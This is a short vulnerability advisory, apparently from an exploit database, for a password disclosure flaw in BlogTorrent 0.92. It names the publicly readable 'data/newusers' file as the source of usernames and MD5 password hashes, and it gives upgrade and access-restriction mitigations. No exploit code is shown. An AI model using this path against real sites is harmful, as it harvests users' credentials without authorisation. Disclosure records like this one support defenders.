Vendor: BlogTorrent
By: LazyCrs && pjphem
CVSS: 7.5 (HIGH)
Password Disclosure
CWE: 200
Product Name: BlogTorrent
Affected Version From: 0.92
Affected Version To: 0.92
Patch Exists: Yes
Related CWE: N/A
CPE: a:blogtorrent:blogtorrent:0.92
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005
BlogTorrent 0.92 <= Remote/Local User Password Disclosure
A vulnerability in BlogTorrent 0.92 lets a remote or local attacker disclose a user's username and password by accessing the 'data/newusers' file, which contains the username and the password as an MD5 hash.
Mitigation:
Upgrade to the latest version of BlogTorrent and ensure that the 'data/newusers' file is not publicly accessible.